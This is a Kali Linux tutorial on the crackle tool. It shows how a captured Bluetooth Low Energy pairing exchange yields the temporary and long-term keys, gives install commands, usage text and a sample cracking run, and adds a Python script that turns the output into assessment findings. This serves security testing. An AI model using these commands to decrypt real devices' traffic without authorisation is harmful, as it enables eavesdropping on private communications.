
CRACKLE Wireless Attack In Kali Linux

Crackle exploits a flaw in the Bluetooth Low Energy (BLE) pairing process that allows an attacker to guess or very quickly brute-force the TK (Temporary Key). With the TK and other data collected from the pairing process, the STK (Short Term Key) and later the LTK (Long Term Key) can be recovered.

With the STK and LTK, all communications between the master and the slave can be decrypted.


If crackle is not installed on your Linux system, install it with:

apt-get update
apt-get install crackle


Run crackle with no arguments to print its usage:


root@kali:~# crackle
Usage: crackle -i <input.pcap> [-o <output.pcap>] [-l <ltk>]
Cracks Bluetooth Low Energy encryption (AKA Bluetooth Smart)

Major modes:  Crack TK // Decrypt with LTK

Crack TK:

Input PCAP file must contain a complete pairing conversation. If any
packet is missing, cracking will not proceed. The PCAP file will be
decrypted if -o <output.pcap> is specified. If LTK exchange is in
the PCAP file, the LTK will be dumped to stdout.

Decrypt with LTK:

Input PCAP file must contain at least LL_ENC_REQ and LL_ENC_RSP
(which contain the SKD and IV). The PCAP file will be decrypted if
the LTK is correct.

LTK format: a string of hex bytes, no separator, most-significant
octet to least-significant octet.

Example: -l 81b06facd90fe7a6e9bbd9cee59736a7

Optional arguments:

-v   Be verbose
-t   Run tests against crypto engine


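To crack the TK, pass a capture that contains the complete pairing conversation. With -o, the decrypted packets are written to a new PCAP file:

root@kali:~# crackle -i ltk_exchange.pcap -o ltk-decrypted.pcap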

TK found: 000000
ding ding ding, using a TK of 0! Just Cracks(tm)

Warning: packet is too short to be encrypted (1), skipping
LTK found: 7f62c053f104a5bbe68b1d896a2ed49c
Done, processed 712 total packets, decrypted 3
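
For an assessment report it helps to turn this output into structured findings. The following is an added example, not part of the original article or of crackle itself: it parses the output shown above (embedded as a constructed sample), validates the LTK against the format that -l expects, and builds the "Decrypt with LTK" command for a later capture. The function names and the later_*.pcap file names are hypothetical.

```python
import re

# Constructed sample: the crackle output shown above on this page.
SAMPLE_OUTPUT = """\
TK found: 000000
ding ding ding, using a TK of 0! Just Cracks(tm)

Warning: packet is too short to be encrypted (1), skipping
LTK found: 7f62c053f104a5bbe68b1d896a2ed49c
Done, processed 712 total packets, decrypted 3
"""

def normalize_ltk(text):
    """Return the LTK as 32 lowercase hex digits, the form `-l` expects."""
    cleaned = re.sub(r"[\s:-]", "", text)  # drop common separators
    if not re.fullmatch(r"[0-9a-fA-F]{32}", cleaned):
        raise ValueError("LTK must be 16 octets of hex, most-significant first")
    return cleaned.lower()

def parse_crackle_output(output):
    """Pull the TK, LTK, warnings and packet counts out of crackle's stdout."""
    report = {"tk": None, "tk_is_zero": False, "ltk": None,
              "warnings": [], "processed": None, "decrypted": None}
    for line in map(str.strip, output.splitlines()):
        if m := re.fullmatch(r"TK found: (\d+)", line):
            report["tk"] = int(m.group(1))
            # A TK of 0 is what legacy "Just Works" pairing uses.
            report["tk_is_zero"] = report["tk"] == 0
        elif m := re.fullmatch(r"LTK found: (\S+)", line):
            report["ltk"] = normalize_ltk(m.group(1))
        elif line.startswith("Warning:"):
            report["warnings"].append(line[len("Warning:"):].strip())
        elif m := re.fullmatch(
                r"Done, processed (\d+) total packets, decrypted (\d+)", line):
            report["processed"] = int(m.group(1))
            report["decrypted"] = int(m.group(2))
    return report

def decrypt_command(report, in_pcap, out_pcap):
    """argv for crackle's 'Decrypt with LTK' mode on a later capture."""
    if report["ltk"] is None:
        raise ValueError("no LTK in this run; the capture lacked the LTK exchange")
    return ["crackle", "-i", in_pcap, "-o", out_pcap, "-l", report["ltk"]]

if __name__ == "__main__":
    report = parse_crackle_output(SAMPLE_OUTPUT)
    print(report)
    # Hypothetical file names for a later capture of the same two devices.
    print(" ".join(decrypt_command(report, "later_session.pcap", "later_decrypted.pcap")))
```

A report with tk_is_zero set and an LTK present means every later session between the same two devices can be decrypted from a capture of LL_ENC_REQ and LL_ENC_RSP alone, which is the finding to record against the device's pairing configuration.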
